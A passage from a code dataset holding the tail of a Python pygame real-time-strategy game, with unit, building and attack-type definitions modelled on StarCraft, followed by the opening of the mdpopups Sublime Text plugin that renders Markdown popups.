thisAttack.targetSprite = object #saves target sprite for retargetting\n thisAttack.target = object.rect.center #sets target\n if a.Type.attackType.Name == \"Volatile Burst\":\n a.kill()\n a.attackCounter = 0\n a.targetSprite = object\n a.target = None\n \n #building collision commented out for now because poorly implemented\n '''\n for object in BuildingList: #building list collisions\n collisionList = pygame.sprite.spritecollide(object, UnitList, False) #obtain list of any hits with units\n Building = object\n for object in collisionList:\n object.target = None #stop moving\n object.rect.center = (object.trueX - 6, object.trueY - 6) #move out of collision range to allow retargeting\n if pygame.sprite.collide_rect(object, Building): #check move worked\n object.rect.center = (object.trueX + 12, object.trueY + 12) #move in other direction to compensate\n ''' \n\n\n \n animInit = 0 #var to skip if for first run\n for counter in range(0,2):\n if counter == 0:\n thisList = UnitList\n else:\n thisList = AttackList\n for object in AttackList:\n if approxEquals(object.targetSprite, object.trueX, object.trueY):\n object.Type.TakeDamage(object.targetSprite) #apply damage to unit\n if object.targetSprite.Health <= 0: #if health is gone, kill sprite\n object.targetSprite.kill()\n object.kill() #stops rendering upon collision \n for object in thisList:\n if animInit == 1:\n animCounter -= 1 #resets animCounter each run, after first, to avoid speeding up\n animCounter = object.updateAnim(animCounter)\n animInit = 1\n if object.isAttack == False:\n if object.attackCounter >= (object.Type.attackType.attackCooldown * 30) and object.targetSprite == None: #leaves counter at max\n object.attackCounter = object.attackCounter\n elif object.attackCounter >= (object.Type.attackType.attackCooldown * 30): #resets if attacking\n object.attackCounter = 0\n else:\n object.attackCounter += 1 \n AttackList = object.updatePosition(AttackList) #updates position of all sprites\n\n \n\n font = pygame.font.Font(None, 36) #completion percentages\n for object in BuildingList:\n if object.Type.isResearching == True:\n originalImage = pygame.image.load(os.path.join('sprites', object.Type.Image1))\n if object.researchCounter >= (object.Type.researchType.buildTime):\n object.Type.researchType.x = object.trueX + 96\n object.Type.researchType.y = object.trueY + 96 #sets spawn point\n UnitList.add(Sprite(object.Type.researchType))\n object.researchCounter = 0\n object.Type.researchType = None\n object.Type.isResearching = False\n object.image.blit(originalImage, originalImage.get_rect())\n else:\n object.researchCounter += 1\n object.image.blit(originalImage, originalImage.get_rect())\n percentage = (round(((object.researchCounter / (object.Type.researchType.buildTime)) * 100)))\n text = font.render(str(percentage) + \"%\", 1, (0,0,255))\n textPos = text.get_rect(center=(100, 100))\n object.image.blit(text, textPos)\n \n UnitList.draw(screen) #draws sprites\n AttackList.draw(screen)\n BuildingList.draw(screen)\n \n pygame.display.flip() #draw frame\n \n pygame.quit() # for a smooth quit\n\nif __name__ == \"__main__\":\n animCounter = 0\n unitTypeList = []\n attackTypeList = []\n buildingTypeList = []\n \n\n #building definitions\n \n gateway = buildingType()\n gateway.Name = \"Gateway\"\n gateway.Image1 = \"Gateway 128x128.bmp\"\n gateway.Team = \"Protoss\"\n gateway.hotKey = [\"s\", \"z\"]\n gateway.unitOrder = [\"Stalker\", \"Zealot\"]\n buildingTypeList.append(gateway)\n\n barracks = buildingType()\n barracks.Name = \"Barracks\"\n barracks.Image1 = \"Barracks 128x128.bmp\"\n barracks.Team = \"Terran\"\n barracks.hotKey = [\"a\", \"d\"]\n barracks.unitOrder = [\"Marine\", \"Marauder\"]\n barracks.x = 300\n buildingTypeList.append(barracks)\n\n factory = buildingType()\n factory.Name = \"Factory\"\n factory.Image1 = \"Factory 128x128.bmp\"\n factory.Team = \"Terran\"\n factory.hotKey = [\"s\",\"e\"]\n factory.unitOrder = [\"Siege Tank\", \"Hellion\"]\n factory.x = 500\n buildingTypeList.append(factory)\n\n starport = buildingType()\n starport.Name = \"Starport\"\n starport.Image1 = \"Starport 128x128.bmp\"\n starport.Team = \"Terran\"\n starport.hotKey = [\"e\",\"v\"]\n starport.unitOrder = [\"Banshee\", \"Viking\"]\n starport.x = 700\n buildingTypeList.append(starport)\n\n roboticsFacility = buildingType()\n roboticsFacility.Name = \"Robotics Facility\"\n roboticsFacility.Image1 = \"Robotics 128x128.bmp\"\n roboticsFacility.Team = \"Protoss\"\n roboticsFacility.hotKey = [\"c\", \"i\"]\n roboticsFacility.unitOrder = [\"Colossus\", \"Immortal\"]\n roboticsFacility.y = 300\n buildingTypeList.append(roboticsFacility)\n\n stargate = buildingType()\n stargate.Name = \"Stargate\"\n stargate.Image1 = \"Stargate 128x128.bmp\"\n stargate.Team = \"Protoss\"\n stargate.hotKey = [\"v\", \"x\"]\n stargate.unitOrder = [\"Void Ray\", \"Phoenix\"]\n stargate.y = 500\n buildingTypeList.append(stargate)\n\n spawningPool = buildingType()\n spawningPool.Name = \"Spawning Pool\"\n spawningPool.Image1 = \"Pool 128x128.bmp\"\n spawningPool.Team = \"Zerg\"\n spawningPool.hotKey = [\"e\",\"z\"]\n spawningPool.unitOrder = [\"Baneling\", \"Zergling\"]\n spawningPool.y = 500\n spawningPool.x = 300\n buildingTypeList.append(spawningPool)\n\n roachWarren = buildingType()\n roachWarren.Name = \"Roach Warren\"\n roachWarren.Image1 = \"RoachWarren 128x128.bmp\"\n roachWarren.Team = \"Zerg\"\n roachWarren.hotKey = [\"h\",\"r\"]\n roachWarren.unitOrder = [\"Hydralisk\", \"Roach\"]\n roachWarren.y = 500\n roachWarren.x = 500\n buildingTypeList.append(roachWarren)\n\n spire = buildingType()\n spire.Name = \"Spire\"\n spire.Image1 = \"Spire 128x128.bmp\"\n spire.Team = \"Zerg\"\n spire.hotKey = [\"c\",\"t\"]\n spire.unitOrder = [\"Corruptor\", \"Mutalisk\"]\n spire.y = 500\n spire.x = 700\n buildingTypeList.append(spire)\n\n #attack definitions\n \n particleDisruptors = attackType()\n particleDisruptors.Name = \"Particle Disruptors\"\n particleDisruptors.Image1 = 'StalkerAttack 32x32.bmp'\n particleDisruptors.Image2 = 'StalkerAttack 32x32.bmp'\n particleDisruptors.attackDamage = 10\n particleDisruptors.attackAir = True\n particleDisruptors.attackGround = True\n particleDisruptors.attackRange = 6\n particleDisruptors.attackCooldown = 1.44\n attackTypeList.append(particleDisruptors)\n\n psiBlades = attackType()\n psiBlades.Name = \"Psi Blades\"\n psiBlades.Image1 = 'ZealotAttack 32x32.bmp'\n psiBlades.Image2 = 'ZealotAttack 32x32.bmp'\n psiBlades.attackDamage = 16\n psiBlades.attackAir = False\n psiBlades.attackGround = True\n psiBlades.attackRange = 0.1\n psiBlades.attackCooldown = 1.2\n attackTypeList.append(psiBlades)\n\n c14Rifle = attackType()\n c14Rifle.Size = 16\n c14Rifle.Name = \"C-14 Gauss Rifle\"\n c14Rifle.Image1 = 'MarineAttack1 16x16.bmp'\n c14Rifle.Image2 = 'MarineAttack2 16x16.bmp'\n c14Rifle.attackDamage = 6\n c14Rifle.attackGround = True\n c14Rifle.attackAir = True\n c14Rifle.attackRange = 5\n c14Rifle.attackCooldown = 0.8608\n attackTypeList.append(c14Rifle)\n\n punisherGrenades = attackType()\n punisherGrenades.Name = \"Punisher Grenades\"\n punisherGrenades.Image1 = 'MarauderAttack1 32x32.bmp'\n punisherGrenades.Image2 = 'MarauderAttack2 32x32.bmp'\n punisherGrenades.attackDamage = 10\n punisherGrenades.attackGround = True\n punisherGrenades.attackAir = False\n punisherGrenades.attackRange = 6\n punisherGrenades.attackCooldown = 1.5\n attackTypeList.append(punisherGrenades)\n\n internalFlamethrower = attackType()\n internalFlamethrower.Name = \"Internal Flamethrower\"\n internalFlamethrower.Image1 = 'HellionAttack1 32x64.bmp'\n internalFlamethrower.Image2 = 'HellionAttack2 32x64.bmp'\n internalFlamethrower.attackDamage = 8\n internalFlamethrower.attackGround = True\n internalFlamethrower.attackAir = False\n internalFlamethrower.attackRange = 5\n internalFlamethrower.attackCooldown = 2.5\n attackTypeList.append(internalFlamethrower)\n\n Cannon = attackType()\n Cannon.Name = \"90mm Twin Cannon\"\n Cannon.Image1 = 'SiegeTankAttack 32x32.bmp'\n Cannon.Image2 = 'SiegeTankAttack 32x32.bmp'\n Cannon.attackDamage = 10\n Cannon.attackGround = True\n Cannon.attackAir = False\n Cannon.attackRange = 7\n Cannon.attackCooldown = 1.04\n attackTypeList.append(Cannon)\n\n backlashRockets = attackType()\n backlashRockets.Name = \"Backlash Rockets\"\n backlashRockets.Image1 = 'BansheeAttack 32x32.bmp'\n backlashRockets.Image2 = 'BansheeAttack 32x32.bmp'\n backlashRockets.attackDamage = 24\n backlashRockets.attackGround = True\n backlashRockets.attackAir = False\n backlashRockets.attackRange = 6\n backlashRockets.attackCooldown = 1.25\n attackTypeList.append(backlashRockets)\n\n lanzerTorpedoes = attackType()\n lanzerTorpedoes.Name = \"Lanzer Torpedoes\"\n lanzerTorpedoes.Image1 = 'VikingAttack1 32x32.bmp'\n lanzerTorpedoes.Image2 = 'VikingAttack2 32x32.bmp'\n lanzerTorpedoes.attackDamage = 20\n lanzerTorpedoes.attackGround = False\n lanzerTorpedoes.attackAir = True\n lanzerTorpedoes.attackRange = 9\n lanzerTorpedoes.attackCooldown = 2\n attackTypeList.append(lanzerTorpedoes)\n\n thermalLances = attackType()\n thermalLances.Name = \"Thermal Lances\"\n thermalLances.Image1 = 'ColossusAttack1 32x64.bmp'\n thermalLances.Image2 = 'ColossusAttack2 32x64.bmp'\n thermalLances.attackDamage = 30\n thermalLances.attackGround = True\n thermalLances.attackAir = False\n thermalLances.attackRange = 9\n thermalLances.attackCooldown = 1.65\n attackTypeList.append(thermalLances)\n\n phaseDisruptors = attackType()\n phaseDisruptors.Name = \"Phase Disruptors\"\n phaseDisruptors.Image1 = 'ImmortalAttack 32x32.bmp'\n phaseDisruptors.Image2 = 'ImmortalAttack 32x32.bmp'\n phaseDisruptors.attackDamage = 20\n phaseDisruptors.attackGround = True\n phaseDisruptors.attackAir = False\n phaseDisruptors.attackRange = 6\n phaseDisruptors.attackCooldown = 1.45\n attackTypeList.append(phaseDisruptors)\n\n prismaticBeam = attackType()\n prismaticBeam.Name = \"Prismatic Beam\"\n prismaticBeam.Image1 = 'VoidRayAttack1 32x64.bmp'\n prismaticBeam.Image2 = 'VoidRayAttack2 32x64.bmp'\n prismaticBeam.attackDamage = 8\n prismaticBeam.attackGround = True\n prismaticBeam.attackAir = True\n prismaticBeam.attackRange = 6\n prismaticBeam.attackCooldown = 0.6\n attackTypeList.append(prismaticBeam)\n\n ionCannons = attackType()\n ionCannons.Name = \"Ion Cannons\"\n ionCannons.Image1 = 'PhoenixAttack1 32x32.bmp'\n ionCannons.Image2 = 'PhoenixAttack2 32x32.bmp'\n ionCannons.attackDamage = 10\n ionCannons.attackGround = False\n ionCannons.attackAir = True\n ionCannons.attackRange = 4\n ionCannons.attackCooldown = 1.11\n attackTypeList.append(ionCannons)\n\n claws = attackType()\n claws.size = 16\n claws.Name = \"Claws\"\n claws.Image1 = 'ZerglingAttack 16x16.bmp'\n claws.Image2 = 'ZerglingAttack 16x16.bmp'\n claws.attackDamage = 5\n claws.attackGround = True\n claws.attackAir = False\n claws.attackRange = 0.1\n claws.attackCooldown = 0.587\n attackTypeList.append(claws)\n\n volatileBurst = attackType()\n volatileBurst.Name = \"Volatile Burst\"\n volatileBurst.Image1 = 'BanelingAttack 32x32.bmp'\n volatileBurst.Image2 = 'BanelingAttack 32x32.bmp'\n volatileBurst.attackDamage = 35\n volatileBurst.attackGround = True\n volatileBurst.attackAir = False\n volatileBurst.attackRange = 0.1\n volatileBurst.attackCooldown = 0.833\n attackTypeList.append(volatileBurst)\n\n acidSaliva = attackType()\n acidSaliva.Name = \"Acid Saliva\"\n acidSaliva.Image1 = 'RoachAttack1 32x32.bmp'\n acidSaliva.Image2 = 'RoachAttack2 32x32.bmp'\n acidSaliva.attackDamage = 16\n acidSaliva.attackGround = True\n acidSaliva.attackAir = False\n acidSaliva.attackRange = 4\n acidSaliva.attackCooldown = 2\n attackTypeList.append(acidSaliva)\n\n needleSpines = attackType()\n needleSpines.size = 16\n needleSpines.Name = \"Needle Spines\"\n needleSpines.Image1 = 'HydraAttack 16x16.bmp'\n needleSpines.Image2 = 'HydraAttack 16x16.bmp'\n needleSpines.attackDamage = 12\n needleSpines.attackGround = True\n needleSpines.attackAir = True\n needleSpines.attackRange = 5\n needleSpines.attackCooldown = 0.83\n attackTypeList.append(needleSpines)\n\n glaiveWurm = attackType()\n glaiveWurm.Name = \"Glaive Wurm\"\n glaiveWurm.Image1 = 'MutaliskAttack 16x16.bmp'\n glaiveWurm.Image2 = 'MutaliskAttack 16x16.bmp'\n glaiveWurm.attackDamage = 9\n glaiveWurm.attackGround = True\n glaiveWurm.attackAir = True\n glaiveWurm.attackRange = 3\n glaiveWurm.attackCooldown = 1.5246\n attackTypeList.append(glaiveWurm)\n\n parasiteSpores = attackType()\n parasiteSpores.Name = \"Parasite Spores\"\n parasiteSpores.Image1 = 'CorruptorAttack1 32x32.bmp'\n parasiteSpores.Image2 = 'CorruptorAttack2 32x32.bmp'\n parasiteSpores.attackDamage = 14\n parasiteSpores.attackGround = False\n parasiteSpores.attackAir = True\n parasiteSpores.attackRange = 6\n parasiteSpores.attackCooldown = 1.9\n attackTypeList.append(parasiteSpores)\n \n #unit definitions\n \n stalker = unitType()\n stalker.attackType = particleDisruptors\n stalker.Name = \"Stalker\"\n stalker.Team = \"Protoss\"\n stalker.Image1 = 'Stalker1 64x64.bmp'\n stalker.Image2 = 'Stalker2 64x64.bmp'\n stalker.Speed = 2.953\n stalker.buildTime = 42\n stalker.unitHealth = 160\n unitFlying = False\n unitTypeList.append(stalker)\n\n zealot = unitType()\n zealot.size = 48\n zealot.attackType = psiBlades\n zealot.Name = \"Zealot\"\n zealot.Team = \"Protoss\"\n zealot.Image1 = 'Zealot1 48x48.bmp'\n zealot.Image2 = 'Zealot2 48x48.bmp'\n zealot.Speed = 2.25\n zealot.buildTime = 38\n zealot.unitHealth = 150\n zealot.unitFlying = False\n unitTypeList.append(zealot)\n\n marine = unitType()\n marine.size = 48\n marine.attackType = c14Rifle\n marine.Name = \"Marine\"\n marine.Team = \"Terran\"\n marine.Image1 = 'Marine1 48x48.bmp'\n marine.Image2 = 'Marine2 48x48.bmp'\n marine.Speed = 2.25\n marine.buildTime = 25\n marine.unitHealth = 45\n marine.unitFlying = False\n unitTypeList.append(marine)\n\n marauder = unitType()\n marauder.attackType = punisherGrenades\n marauder.Name = \"Marauder\"\n marauder.Team = \"Terran\"\n marauder.Image1 = 'Marauder1 64x64.bmp'\n marauder.Image2 = 'Marauder2 64x64.bmp'\n marauder.Speed = 2.25\n marauder.buildTime = 30\n marauder.unitHealth = 125\n marauder.unitFlying = False\n unitTypeList.append(marauder)\n\n hellion = unitType()\n hellion.attackType = internalFlamethrower\n hellion.Name = \"Hellion\"\n hellion.Team = \"Terran\"\n hellion.Image1 = 'Hellion1 64x64.bmp'\n hellion.Image2 = 'Hellion2 64x64.bmp'\n hellion.Speed = 4.25\n hellion.buildTime = 30\n hellion.unitHealth = 90\n hellion.unitFlying = False\n unitTypeList.append(hellion)\n\n tank = unitType()\n tank.attackType = Cannon\n tank.Name = \"Siege Tank\"\n tank.Team = \"Terran\"\n tank.Image1 = 'SiegeTank1 64x64.bmp'\n tank.Image2 = 'SiegeTank2 64x64.bmp'\n tank.Speed = 2.25\n tank. buildTime = 45\n tank.unitHealth = 160\n tank.unitFlying = False\n unitTypeList.append(tank)\n\n banshee = unitType()\n banshee.attackType = backlashRockets\n banshee.Name = \"Banshee\"\n banshee.Team = \"Terran\"\n banshee.Image1 = 'Banshee1 64x64.bmp'\n banshee.Image2 = 'Banshee2 64x64.bmp'\n banshee.Speed = 2.75\n banshee. buildTime = 60\n banshee.unitHealth = 140\n banshee.unitFlying = True\n unitTypeList.append(banshee)\n\n viking = unitType()\n viking.attackType = lanzerTorpedoes\n viking.Name = \"Viking\"\n viking.Team = \"Terran\"\n viking.Image1 = 'Viking1 64x64.bmp'\n viking.Image2 = 'Viking2 64x64.bmp'\n viking.Speed = 2.75\n viking.buildTime = 42\n viking.unitHealth = 125\n viking.unitFlying = True\n unitTypeList.append(viking)\n\n colossus = unitType()\n colossus.size = 128\n colossus.attackType = thermalLances\n colossus.Name = \"Colossus\"\n colossus.Team = \"Protoss\"\n colossus.Image1 = 'Colossus1 128x128.bmp'\n colossus.Image2 = 'Colossus2 128x128.bmp'\n colossus.Speed = 2.25\n colossus.buildTime = 75\n colossus.unitHealth = 350\n colossus.unitFlying = False\n unitTypeList.append(colossus)\n\n immortal = unitType()\n immortal.attackType = phaseDisruptors\n immortal.Name = \"Immortal\"\n immortal.Team = \"Protoss\"\n immortal.Image1 = 'Immortal1 64x64.bmp'\n immortal.Image2 = 'Immortal2 64x64.bmp'\n immortal.Speed = 2.25\n immortal.buildTime = 55\n immortal.unitHealth = 300\n immortal.unitFlying = False\n unitTypeList.append(immortal)\n\n voidRay = unitType()\n voidRay.attackType = prismaticBeam\n voidRay.Name = \"Void Ray\"\n voidRay.Team = \"Protoss\"\n voidRay.Image1 = 'VoidRay1 64x64.bmp'\n voidRay.Image2 = 'VoidRay2 64x64.bmp'\n voidRay.Speed = 2.25\n voidRay.buildTime = 60\n voidRay.unitHealth = 250\n voidRay.unitFlying = True\n unitTypeList.append(voidRay)\n\n phoenix = unitType()\n phoenix.attackType = ionCannons\n phoenix.Name = \"Phoenix\"\n phoenix.Team = \"Protoss\"\n phoenix.Image1 = 'Phoenix1 64x64.bmp'\n phoenix.Image2 = 'Phoenix2 64x64.bmp'\n phoenix.Speed = 4.25\n phoenix.buildTime = 35\n phoenix.unitHealth = 180\n phoenix.unitFlying = True\n unitTypeList.append(phoenix)\n\n zergling = unitType()\n zergling.size = 32\n zergling.attackType = claws\n zergling.Name = \"Zergling\"\n zergling.Team = \"Zerg\"\n zergling.Image1 = 'Zergling1 32x32.bmp'\n zergling.Image2 = 'Zergling2 32x32.bmp'\n zergling.Speed = 4.6991\n zergling.buildTime = 24\n zergling.unitHealth = 35\n zergling.unitFlying = False\n unitTypeList.append(zergling)\n\n baneling = unitType()\n baneling.size = 32\n baneling.attackType = volatileBurst\n baneling.Name = \"Baneling\"\n baneling.Team = \"Zerg\"\n baneling.Image1 = 'Baneling1 32x32.bmp'\n baneling.Image2 = 'Baneling2 32x32.bmp'\n baneling.Speed = 2.9531\n baneling.buildTime = 44\n baneling.unitHealth = 30\n baneling.unitFlying = False\n unitTypeList.append(baneling)\n\n roach = unitType()\n roach.attackType = acidSaliva\n roach.Name = \"Roach\"\n roach.Team = \"Zerg\"\n roach.Image1 = 'Roach1 64x64.bmp'\n roach.Image2 = 'Roach2 64x64.bmp'\n roach.Speed = 2.25\n roach.buildTime = 27\n roach.unitHealth = 145\n roach.unitFlying = False\n unitTypeList.append(roach)\n\n hydralisk = unitType()\n hydralisk.attackType = needleSpines\n hydralisk.Name = \"Hydralisk\"\n hydralisk.Team = \"Zerg\"\n hydralisk.Image1 = 'Hydra1 64x64.bmp'\n hydralisk.Image2 = 'Hydra2 64x64.bmp'\n hydralisk.Speed = 2.25\n hydralisk.buildTime = 33\n hydralisk.unitHealth = 80\n hydralisk.unitFlying = False\n unitTypeList.append(hydralisk)\n\n mutalisk = unitType()\n mutalisk.attackType = glaiveWurm\n mutalisk.Name = \"Mutalisk\"\n mutalisk.Team = \"Zerg\"\n mutalisk.Image1 = 'Mutalisk1 64x64.bmp'\n mutalisk.Image2 = 'Mutalisk2 64x64.bmp'\n mutalisk.Speed = 3.75\n mutalisk.buildTime = 33\n mutalisk.unitHealth = 120\n mutalisk.unitFlying = True\n unitTypeList.append(mutalisk)\n\n corruptor = unitType()\n corruptor.attackType = parasiteSpores\n corruptor.Name = \"Corruptor\"\n corruptor.Team = \"Zerg\"\n corruptor.Image1 = 'Corruptor1 64x64.bmp'\n corruptor.Image2 = 'Corruptor2 64x64.bmp'\n corruptor.Speed = 2.9531\n corruptor.buildTime = 40\n corruptor.unitHealth = 200\n corruptor.unitFlying = True\n unitTypeList.append(corruptor)\n \n main(animCounter, unitTypeList, attackTypeList, buildingTypeList)\n","sub_path":"8. AttackTest 2.py","file_name":"8. AttackTest 2.py","file_ext":"py","file_size_in_byte":45145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"274195081","text":"# -*- coding: utf-8 -*-\n\"\"\"\nMarkdown popup.\n\nMarkdown tooltips and phantoms for SublimeText.\n\nTextMate theme to CSS.\n\nhttps://manual.macromates.com/en/language_grammars#naming_conventions\n\"\"\"\nimport sublime\nimport markdown\nimport jinja2\nimport traceback\nimport time\nfrom . import version as ver\nfrom . import colorbox\nfrom collections import OrderedDict\nfrom .st_scheme_template import Scheme2CSS, POPUP, PHANTOM\nfrom .st_clean_css import clean_css\nfrom .st_pygments_highlight import syntax_hl as pyg_syntax_hl\nfrom .st_code_highlight import SublimeHighlight\nfrom .st_mapping import lang_map\nfrom . import imagetint\nimport re\nimport os\ntry:\n import bs4\nexcept Exception:\n bs4 = None\n\nPHANTOM_SUPPORT = int(sublime.version()) >= 3118\nBASE_CSS = 'Packages/mdpopups/css/base.css'\nDEFAULT_CSS = 'Packages/mdpopups/css/default.css'\nDEFAULT_USER_CSS = 'Packages/User/mdpopups.css'\nbase_css = None\nIDK = '''\n\n

¯\\_(ツ)_/¯'

\n'''\nHL_SETTING = 'mdpopups.use_sublime_highlighter'\nFORMAT_SETTING = 'mdpopups.default_formatting'\nRE_BAD_ENTITIES = re.compile(r'(&(?!amp;|lt;|gt;|nbsp;)(?:\\w+;|#\\d+;))')\n\nNODEBUG = 0\nERROR = 1\nWARNING = 2\nINFO = 3\n\n\ndef _log(msg):\n \"\"\"Log.\"\"\"\n\n print('mdpopups: %s' % str(msg))\n\n\ndef _debug(msg, level):\n \"\"\"Debug log.\"\"\"\n\n if int(_get_setting('mdpopups.debug', NODEBUG)) >= level:\n _log(msg)\n\n\ndef _get_setting(name, default=None):\n \"\"\"Get the Sublime setting.\"\"\"\n\n return sublime.load_settings('Preferences.sublime-settings').get(name, default)\n\n\ndef _can_show(view, location=-1):\n \"\"\"\n Check if popup can be shown.\n\n I have seen Sublime can sometimes crash if trying\n to do a popup off screen. Normally it should just not show,\n but sometimes it can crash. We will check if popup\n can/should be attempted.\n \"\"\"\n\n can_show = True\n sel = view.sel()\n if location >= 0:\n region = view.visible_region()\n if region.begin() > location or region.end() < location:\n can_show = False\n elif len(sel) >= 1:\n region = view.visible_region()\n if region.begin() > sel[0].b or region.end() < sel[0].b:\n can_show = False\n else:\n can_show = False\n\n return can_show\n\n##############################\n# Theme/Scheme cache management\n##############################\n_scheme_cache = OrderedDict()\n_highlighter_cache = OrderedDict()\n\n\ndef _clear_cache():\n \"\"\"Clear the css cache.\"\"\"\n\n global _scheme_cache\n global _highlighter_cache\n global base_css\n base_css = None\n _scheme_cache = OrderedDict()\n _highlighter_cache = OrderedDict()\n\n\ndef _is_cache_expired(cache_time):\n \"\"\"Check if the cache entry is expired.\"\"\"\n\n delta_time = _get_setting('mdpopups.cache_refresh_time', 30)\n if not isinstance(delta_time, int) or delta_time < 0:\n delta_time = 30\n return delta_time == 0 or (time.time() - cache_time) >= (delta_time * 60)\n\n\ndef _prune_cache():\n \"\"\"Prune older items in cache (related to when they were inserted).\"\"\"\n\n limit = _get_setting('mdpopups.cache_limit', 10)\n if limit is None or not isinstance(limit, int) or limit <= 0:\n limit = 10\n while len(_scheme_cache) >= limit:\n _scheme_cache.popitem(last=True)\n while len(_highlighter_cache) >= limit:\n _highlighter_cache.popitem(last=True)\n\n\ndef _get_sublime_highlighter(view):\n \"\"\"Get the SublimeHighlighter.\"\"\"\n\n scheme = view.settings().get('color_scheme')\n obj = None\n if scheme is not None:\n if scheme in _highlighter_cache:\n obj, t = _highlighter_cache[scheme]\n if _is_cache_expired(t):\n obj = None\n if obj is None:\n try:\n obj = SublimeHighlight(scheme)\n _prune_cache()\n _highlighter_cache[scheme] = (obj, time.time())\n except Exception:\n _log('Failed to get Sublime highlighter object!')\n _debug(traceback.format_exc(), ERROR)\n pass\n return obj\n\n\ndef _get_scheme(view):\n \"\"\"Get the scheme object and user CSS.\"\"\"\n\n scheme = view.settings().get('color_scheme')\n settings = sublime.load_settings(\"Preferences.sublime-settings\")\n obj = None\n user_css = ''\n if scheme is not None:\n if scheme in _scheme_cache:\n obj, user_css, t = _scheme_cache[scheme]\n # Check if cache expired or user changed pygments setting.\n if (\n _is_cache_expired(t) or\n obj.variables.get('use_pygments', True) != (not settings.get(HL_SETTING, False)) or\n obj.variables.get('default_formatting', True) != settings.get(FORMAT_SETTING, True)\n ):\n obj = None\n user_css = ''\n if obj is None:\n try:\n obj = Scheme2CSS(scheme)\n _prune_cache()\n user_css = _get_user_css()\n _scheme_cache[scheme] = (obj, user_css, time.time())\n except Exception:\n _log('Failed to convert/retrieve scheme to CSS!')\n _debug(traceback.format_exc(), ERROR)\n return obj, user_css\n\n\ndef _get_user_css():\n \"\"\"Get user css.\"\"\"\n\n css = None\n\n user_css = _get_setting('mdpopups.user_css', DEFAULT_USER_CSS)\n try:\n css = clean_css(sublime.load_resource(user_css))\n except Exception:\n css = clean_css(sublime.load_resource(DEFAULT_CSS))\n return css if css else ''\n\n\n##############################\n# Markdown parsing\n##############################\nclass _MdWrapper(markdown.Markdown):\n \"\"\"\n Wrapper around Python Markdown's class.\n\n This allows us to gracefully continue when a module doesn't load.\n \"\"\"\n\n Meta = {}\n\n def __init__(self, *args, **kwargs):\n \"\"\"Call original init.\"\"\"\n\n super(_MdWrapper, self).__init__(*args, **kwargs)\n\n def registerExtensions(self, extensions, configs): # noqa\n \"\"\"\n Register extensions with this instance of Markdown.\n\n Keyword arguments:\n\n * extensions: A list of extensions, which can either\n be strings or objects. See the docstring on Markdown.\n * configs: A dictionary mapping module names to config options.\n\n \"\"\"\n\n from markdown import util\n from markdown.extensions import Extension\n\n for ext in extensions:\n try:\n if isinstance(ext, util.string_type):\n ext = self.build_extension(ext, configs.get(ext, {}))\n if isinstance(ext, Extension):\n ext.extendMarkdown(self, globals())\n elif ext is not None:\n raise TypeError(\n 'Extension \"%s.%s\" must be of type: \"markdown.Extension\"'\n % (ext.__class__.__module__, ext.__class__.__name__)\n )\n except Exception:\n # We want to gracefully continue even if an extension fails.\n _log('Failed to load markdown module!')\n _debug(traceback.format_exc(), ERROR)\n\n return self\n\n\ndef _get_theme(view, css=None, css_type=POPUP, template_vars=None):\n \"\"\"Get the theme.\"\"\"\n\n global base_css\n if base_css is None:\n base_css = clean_css(sublime.load_resource(BASE_CSS))\n obj, user_css = _get_scheme(view)\n font_size = view.settings().get('font_size', 12)\n try:\n return obj.apply_template(\n base_css +\n obj.get_css() +\n (clean_css(css) if css else '') +\n user_css,\n css_type,\n font_size,\n template_vars\n ) if obj is not None else ''\n except Exception:\n _log('Failed to retrieve scheme CSS!')\n _debug(traceback.format_exc(), ERROR)\n return ''\n\n\ndef _remove_entities(text):\n \"\"\"Remove unsupported HTML entities.\"\"\"\n\n import html.parser\n html = html.parser.HTMLParser()\n\n def repl(m):\n \"\"\"Replace entites except &, <, >, and nbsp.\"\"\"\n return html.unescape(m.group(1))\n\n return RE_BAD_ENTITIES.sub(repl, text)\n\n\ndef _create_html(\n view, content, md=True, css=None, debug=False, css_type=POPUP,\n wrapper_class=None, template_vars=None, template_env_options=None, nl2br=True\n):\n \"\"\"Create html from content.\"\"\"\n\n debug = _get_setting('mdpopups.debug', NODEBUG)\n\n if css is None or not isinstance(css, str):\n css = ''\n\n style = _get_theme(view, css, css_type, template_vars)\n\n if debug:\n _debug('=====CSS=====', INFO)\n _debug(style, INFO)\n\n if md:\n content = md2html(\n view, content, template_vars=template_vars,\n template_env_options=template_env_options, nl2br=nl2br\n )\n else:\n content = _markup_template(content, template_vars, template_env_options)\n\n if debug:\n _debug('=====HTML OUTPUT=====', INFO)\n if bs4:\n soup = bs4.BeautifulSoup(content, \"html.parser\")\n _debug('\\n' + soup.prettify(), INFO)\n else:\n _debug('\\n' + content, INFO)\n\n if wrapper_class:\n wrapper = ('
' % wrapper_class) + '%s
'\n else:\n wrapper = '
%s
'\n\n html = \"\" % (style)\n html += _remove_entities(wrapper % content)\n return html\n\n\ndef _markup_template(markup, variables, options):\n \"\"\"Template for markup.\"\"\"\n\n if variables:\n if options is None:\n options = {}\n env = jinja2.Environment(**options)\n return env.from_string(markup).render(plugin=variables)\n return markup\n\n\n##############################\n# Public functions\n##############################\ndef version():\n \"\"\"Get the current version.\"\"\"\n\n return ver.version()\n\n\ndef md2html(view, markup, template_vars=None, template_env_options=None, nl2br=True):\n \"\"\"Convert Markdown to HTML.\"\"\"\n\n if _get_setting('mdpopups.use_sublime_highlighter'):\n sublime_hl = (True, _get_sublime_highlighter(view))\n else:\n sublime_hl = (False, None)\n\n extensions = [\n \"markdown.extensions.attr_list\",\n \"markdown.extensions.codehilite\",\n \"mdpopups.mdx.superfences\",\n \"mdpopups.mdx.betterem\",\n \"mdpopups.mdx.magiclink\",\n \"mdpopups.mdx.inlinehilite\",\n \"mdpopups.mdx.extrarawhtml\",\n \"markdown.extensions.admonition\",\n \"markdown.extensions.def_list\"\n ]\n\n if nl2br:\n extensions.append('markdown.extensions.nl2br')\n\n configs = {\n \"mdpopups.mdx.inlinehilite\": {\n \"style_plain_text\": True,\n \"css_class\": \"inline-highlight\",\n \"use_codehilite_settings\": False,\n \"guess_lang\": False,\n \"sublime_hl\": sublime_hl\n },\n \"markdown.extensions.codehilite\": {\n \"guess_lang\": False,\n \"css_class\": \"highlight\"\n },\n \"mdpopups.mdx.superfences\": {\n \"uml_flow\": False,\n \"uml_sequence\": False,\n \"sublime_hl\": sublime_hl\n }\n }\n\n return _MdWrapper(\n extensions=extensions,\n extension_configs=configs\n ).convert(_markup_template(markup, template_vars, template_env_options)).replace('"', '\"').replace('\\n', '')\n\n\ndef color_box(\n colors, border=\"#000000ff\", border2=None, height=32, width=32,\n 